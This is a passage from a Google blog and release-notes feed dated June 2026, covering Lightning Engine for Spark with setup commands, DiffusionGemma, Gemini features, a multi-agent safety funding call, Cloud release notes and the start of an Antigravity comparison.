&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Traditional Spark execution is often bottlenecked by JVM execution overhead and garbage collection pauses. Lightning Engine bypasses these limitations by compiling Spark physical query plans into native C++ instructions optimized for Single Instruction, Multiple Data (SIMD) vectorization.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Built on the open-source Gluten and Velox runtimes with specialized Google-engineered enhancements, this native execution layer accelerates your most demanding data processing tasks with:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Vectorized sort&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Accelerates sorting operations by processing data columnarly in native memory, significantly reducing CPU cycle overhead.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Accelerated window functions&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Speeds up calculations performed across sets of rows (such as moving averages, aggregations, and deduplication) by executing them directly within the native C++ layer.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Smart fallback&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: If a query contains an operator or custom Java UDF that is not natively supported, the engine's intelligent push-down layer automatically and gracefully transitions that specific sub-tree back to the JVM, avoiding unnecessary data format conversions and preserving overall execution stability.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Optimized Cloud Storage and BigQuery connectors&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;High-performance compute is useless if the engine is starved for data. With Lightning Engine, we’ve optimized our storage connectors to ensure that reading data from Cloud Storage and BigQuery isn’t the bottleneck. Optimizations include:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Direct path connection&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Bypasses multiple node hops and uses bi-directional streaming with Cloud Storage. This allows seek operations and vectorized &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;readV&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; APIs to run without reopening streams, accelerating scan times for complex, deeply nested Parquet or ORC files.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Metadata call reduction&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Managing large-scale partitioned tables often comes with a hidden performance tax: the time spent simply listing files. Lightning Engine utilizes lexicographic listing in the driver to collect metadata and transmit it directly to executors, eliminating redundant Cloud Storage API calls and dramatically reducing Cloud Storage metadata costs.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Native BigQuery connector&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Directly consumes BigQuery data in Arrow format. By avoiding the expensive conversion from Arrow to JVM &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;UnsafeRow&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, the engine eliminates serialization overhead to accelerate scan times.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Broadcast joins and advanced query optimization&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Lightning Engine incorporates an advanced, cost-based query optimizer inspired by Google's F1 and Spanner query engines, and introduces several custom optimization rules. Examples include:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Single HashTable caching&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: In standard broadcast joins, Spark builds join hash tables repeatedly across tasks. Lightning Engine builds the hash table once per executor and caches it, eliminating redundant CPU cycles and reducing the executor's memory footprint.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Aggregation pushdown&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Automatically pushes partial aggregations below join shuffles. This minimizes the volume of data that must be transferred across the network, drastically reducing expensive shuffle stages.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Auto shuffle partitioning&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Dynamically and adaptively determines the optimal number of shuffle partitions for each individual query stage based on runtime statistics, preventing out-of-memory (OOM) spills without over-partitioning.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee" href="https://youtube.com/watch?v=2uYC821jtEk"&gt;

      
        

        &lt;div class="article-video__aspect-image"&gt;
          &lt;span class="h-u-visually-hidden"&gt;The new way to use Spark: Intelligent, automated, and lightning fast&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg class="h-c-video__play h-c-icon h-c-icon--color-white" xmlns="http://www.w3.org/2000/svg"&gt;
        &lt;use xlink:href="#mi-youtube-icon" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
      &lt;figcaption class="article-video__caption h-c-page"&gt;
        
          &lt;h4 class="h-c-headline h-c-headline--four h-u-font-weight-medium h-u-mt-std"&gt;Learn more technical details and hear Lowe’s experience with Lightning Engine from Google Cloud Next ‘26&lt;/h4&gt;
        
        
      &lt;/figcaption&gt;
    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"&gt;
   &lt;a class="glue-yt-video" href="https://youtube.com/watch?v=2uYC821jtEk"&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Getting started&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;These updates are live and ready to use today! You can enable Lightning Engine directly through the Google Cloud console or via the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gcloud&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; CLI.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To submit a &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;serverless&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; batch job with Lightning Engine enabled, specify the premium tier in your Spark properties:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud dataproc batches submit pyspark my_script.py \\\r\n    --region=us-central1 \\\r\n    --properties=dataproc:dataproc.tier=premium \\\r\n    --properties=spark:spark.dataproc.lightningEngine.runtime=native&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f82e02884f0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To spin up a new &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;managed cluster&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; with Lightning Engine and Native Query Execution (NQE) enabled, run the following command in your terminal:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud dataproc clusters create my-optimized-cluster \\\r\n    --region=us-central1 \\\r\n    --image-version=2.3 \\\r\n    --engine=lightning \\\r\n    --enable-component-gateway \\\r\n--properties=spark:spark.dataproc.lightningEngine.runtime=native&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f82e0288730&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Alternatively, navigate to the &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Managed Service for Apache Spark&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; page in the &lt;/span&gt;&lt;a href="https://console.cloud.google.com/dataproc"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud console&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, click &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Create Cluster&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, select &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Cluster on Compute Engine&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, and choose &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Lightning Engine&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; under the cluster configuration settings to automatically activate query acceleration for your workloads.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/data-analytics/lighting-engine-for-apache-spark-performance-deep-dive/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-10T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://deepmind.google/blog/diffusiongemma-4x-faster-text-generation</id>
    <title>DiffusionGemma: 4x faster text generation</title>
    <updated>2026-06-10T16:24:11+00:00</updated>
    <link href="https://deepmind.google/blog/diffusiongemma-4x-faster-text-generation" rel="alternate"/>
    <category term="Google DeepMind"/>
    <published>2026-06-10T16:24:11+00:00</published>
  </entry>
  <entry>
    <id>https://deepmind.google/blog/diffusiongemma-4x-faster-text-generation/</id>
    <title>DiffusionGemma: 4x faster text generation</title>
    <updated>2026-06-10T16:24:11+00:00</updated>
    <link href="https://deepmind.google/blog/diffusiongemma-4x-faster-text-generation/" rel="alternate"/>
    <category term="Google DeepMind"/>
    <published>2026-06-10T16:24:11+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/technology/developers-tools/diffusion-gemma-faster-text-generation/</id>
    <title>DiffusionGemma: 4x faster text generation</title>
    <updated>2026-06-10T16:00:00+00:00</updated>
    <content type="html">DiffusionGemma</content>
    <link href="https://blog.google/innovation-and-ai/technology/developers-tools/diffusion-gemma-faster-text-generation/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-10T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/chrome/chrome-expands-latin-america/</id>
    <title>We’re expanding Gemini in Chrome to users in Latin America, Africa, the Middle East and more.</title>
    <updated>2026-06-10T15:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Screenshot_2026-06-09_at_7.15.0.max-600x600.format-webp.webp" /&gt;Google is rolling out many of Chrome's latest AI features in Latin America, Africa, the Middle East and more.</content>
    <link href="https://blog.google/products-and-platforms/products/chrome/chrome-expands-latin-america/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-10T15:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/products/gemini-app/gemini-features-for-businesses/</id>
    <title>Save time and grow your business with new Gemini tools</title>
    <updated>2026-06-10T15:00:00+00:00</updated>
    <content type="html">dashboard with a "Connecting to Google Business Profile" notification.</content>
    <link href="https://blog.google/innovation-and-ai/products/gemini-app/gemini-features-for-businesses/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-10T15:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://deepmind.google/blog/investing-in-multi-agent-ai-safety-research</id>
    <title>Investing in multi-agent AI safety research</title>
    <updated>2026-06-10T10:21:19+00:00</updated>
    <content type="html">Google DeepMind and partners announce a $10M funding call for multi-agent safety research.</content>
    <link href="https://deepmind.google/blog/investing-in-multi-agent-ai-safety-research" rel="alternate"/>
    <category term="Google DeepMind"/>
    <published>2026-06-10T10:21:19+00:00</published>
  </entry>
  <entry>
    <id>https://deepmind.google/blog/investing-in-multi-agent-ai-safety-research/</id>
    <title>Investing in multi-agent AI safety research</title>
    <updated>2026-06-10T10:21:19+00:00</updated>
    <content type="html">Google DeepMind and partners announce a $10M funding call for multi-agent safety research.</content>
    <link href="https://deepmind.google/blog/investing-in-multi-agent-ai-safety-research/" rel="alternate"/>
    <category term="Google DeepMind"/>
    <published>2026-06-10T10:21:19+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/future-report-uk-teen-research/</id>
    <title>The Future Report: UK Teen Research Launch</title>
    <updated>2026-06-10T10:00:00+00:00</updated>
    <content type="html">Google's 2026 report, created with youth consultancy Livity, explores how teens across the UK navigate the digital world, from using AI to seeking balance online.</content>
    <link href="https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/future-report-uk-teen-research/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-10T10:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/read-the-future-report-uk/</id>
    <title>Read The Future Report, our research elevating teen voices across the UK.</title>
    <updated>2026-06-10T10:00:00+00:00</updated>
    <content type="html">Four diverse youth stand together below speech bubbles containing icons for technology, security, education, and well-being.</content>
    <link href="https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/read-the-future-report-uk/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-10T10:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/safeguarding-and-digital-literacy/</id>
    <title>Guiding the AI generation: Why safeguarding and digital literacy must go hand-in-hand</title>
    <updated>2026-06-10T10:00:00+00:00</updated>
    <content type="html">Save the Children Logo</content>
    <link href="https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/safeguarding-and-digital-literacy/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-10T10:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/future-report-why-young-people-must-help-shape-the-future-of-ai/</id>
    <title>The Future Report: Why young people must help shape the future of AI</title>
    <updated>2026-06-10T10:00:00+00:00</updated>
    <content type="html">My Life My Say logo</content>
    <link href="https://blog.google/company-news/inside-google/around-the-globe/google-europe/united-kingdom/future-report-why-young-people-must-help-shape-the-future-of-ai/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-10T10:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/inside-google/around-the-globe/google-latin-america/google-for-brazil-2026/</id>
    <title>Google for Brazil 2026: Helping people make the most of AI</title>
    <updated>2026-06-10T09:00:00+00:00</updated>
    <content type="html">Google for Brazil stage</content>
    <link href="https://blog.google/company-news/inside-google/around-the-globe/google-latin-america/google-for-brazil-2026/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-10T09:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/education/helping-students-and-parents-prepare-for-the-final-exams-period/</id>
    <title>Helping students and parents prepare for the final exams period</title>
    <updated>2026-06-10T08:45:00+00:00</updated>
    <content type="html">Image of a young person wearing headphones at their desk studying</content>
    <link href="https://blog.google/products-and-platforms/products/education/helping-students-and-parents-prepare-for-the-final-exams-period/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-10T08:45:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#June_10_2026</id>
    <title>Cloud Release Notes — June 10, 2026</title>
    <updated>2026-06-10T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Agent Assist&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;Agent Assist offers &lt;a href="https://docs.cloud.google.com/agent-assist/docs/pgka"&gt;Proactive generative knowledge assist&lt;/a&gt; V2 in GA. This version supports rich search context, multiple suggested queries, and granular control over triggering events.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;BigQuery&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;BigQuery continuous queries now support the following aggregation functions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/reference/standard-sql/aggregate_functions#array_agg"&gt;&lt;code&gt;ARRAY_AGG&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/reference/standard-sql/aggregate_functions#string_agg"&gt;&lt;code&gt;STRING_AGG&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Support for these functions is in &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Cloud Billing&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Multi-project access to Cloud Billing cost views available in
Preview&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;In Cloud Billing accounts, multi-project access to usage costs lets
project owners, solution owners, developers, and other non-billing admins
see cost data for all of their authorized projects in a single view in the
Cloud Billing console.&lt;/p&gt;
&lt;p&gt;The multi-project view uses a combination of Cloud Billing account
permissions and Google Cloud project permissions that let Cloud Billing
administrators and organization administrators jointly control access to
project-level cost data.&lt;/p&gt;
&lt;p&gt;Using project-scoped Cloud Billing account permissions,
Cloud Billing administrators can control which solution owners can
view aggregated cost data in the Cloud Billing console.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Learn more about &lt;a href="https://docs.cloud.google.com/billing/docs/how-to/project-owners/overview"&gt;cost management for project owners&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Learn how to &lt;a href="https://docs.cloud.google.com/billing/docs/how-to/project-owners/setup-multi-project-access"&gt;set up multi-project access to costs views&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;
&lt;h2 class="release-note-product-title"&gt;Google Kubernetes Engine&lt;/h2&gt;
&lt;h3&gt;Deprecated&lt;/h3&gt;
&lt;p&gt;The configuration option to not enroll your cluster in a release channel (known
as &lt;em&gt;No channel&lt;/em&gt;, formerly as &lt;em&gt;Static&lt;/em&gt;) is now deprecated, and will be removed
on June 14, 2027. For any clusters not enrolled in a release channel, we
recommend that you &lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/release-channels#existing-cluster"&gt;enroll the cluster&lt;/a&gt;
before this date. After the removal date, GKE will enroll all remaining clusters
in the Stable channel. For more information about this deprecation and how you
can achieve the same functionality with release channels, see &lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/release-channels#no_channel"&gt;Clusters not
enrolled in a release channel&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps Marketplace&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Azure Security Center&lt;/strong&gt;: Version 17.0&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Announced deprecation notice. Connector will be deprecated on 30th March 2027. 
Only critical bug fixes will be considered. For more information refer to the 
documentation of individual connectors in the following connector:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Azure Security Center - Security Alerts Connector&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Google Chronicle&lt;/strong&gt;: Version 85.0&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Updated partial batch handling and added dynamic batch sizing to prevent 
timeout loops, refactored logging and added monitoring signals for process 
health, and pipeline states, and improved detections batch parsing and 
processing efficiency in the following connector:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Chronicle Alerts Connector&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Integration&lt;/strong&gt;: Updated authentication flow mechanism.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Google Cloud IAM&lt;/strong&gt;: Version 20.0&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Updated Predefined Widgets in the following widgets:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;List Roles&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;List Service Accounts&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Microsoft Azure Sentinel&lt;/strong&gt;: Version 64.0&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Announced deprecation notice. Connector will be deprecated on 30th March 2027. 
Only critical bug fixes will be considered. For more information refer to the 
documentation of individual connectors in the following connectors:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Microsoft Azure Sentinel Incident Connector v2&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Microsoft Sentinel Incident Tracking Connector&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Microsoft Defender ATP&lt;/strong&gt;: Version 32.0&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Announced deprecation notice. Connector will be deprecated on 30th March 2027. 
Only critical bug fixes will be considered. For more information refer to the 
documentation of individual connectors in the following connectors:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Microsoft Defender ATP Connector&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Microsoft Defender ATP Connector V2&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Microsoft Graph Mail&lt;/strong&gt;: Version 42.0&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Updated the logic for robust handling of transient upstream API errors and 
connection issues in the following connector:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Microsoft Graph Mail Connector&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Microsoft Graph Mail Delegated&lt;/strong&gt;: Version 19.0&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Updated the logic for robust handling of transient upstream API errors and 
connection issues in the following connector:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Microsoft Graph Mail Delegated Connector&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Microsoft Graph Security&lt;/strong&gt;: Version 27.0&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Announced deprecation notice. Connector will be deprecated on 30th March 2027. 
Only critical bug fixes will be considered. For more information refer to the 
documentation of individual connectors in the following connectors:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Microsoft Graph Office 365 Security and Compliance Connector&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Microsoft Graph Security Connector&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Protectwise&lt;/strong&gt;: Version 7.0&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Refactored the code in the following action:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Get Pcap&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Qualys VM&lt;/strong&gt;: Version 28.0&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Fixed AttributeError during parsing of multiple host lists and added fallback 
hostname matching in the following actions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;List Endpoint Detections&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Enrich Host&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#June_10_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-06-10T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/choosing-your-surface-antigravity-20-antigravity-cli-antigravity-ide-or-antigravity-sdk/</id>
    <title>Choosing your surface: Antigravity 2.0, Antigravity CLI, Antigravity IDE, or Antigravity SDK</title>
    <updated>2026-06-10T07:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong&gt;TL;DR:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Antigravity 2.0:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; A desktop app to orchestrate multiple autonomous agents working in parallel across independent projects.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Antigravity CLI:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; A terminal interface designed for command-line workflows and headless execution.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Antigravity IDE:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; An editor for developers who want to write code directly alongside an agent.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Antigravity SDK:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; A Python library for building and deploying your own custom agents that use the Antigravity Harness.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;Quick Comparison&lt;/h4&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1" style="border-collapse: collapse; width: 100%; height: 67.1952px;"&gt;
&lt;tbody&gt;
&lt;tr style="height: 22.3984px;"&gt;
&lt;td style="width: 18.1727%; height: 22.3984px;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Feature&lt;/strong&gt;&lt;/td&gt;
&lt;td style="width: 18.1727%; height: 22.3984px;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Antigravity 2.0&lt;/strong&gt;&lt;/td&gt;
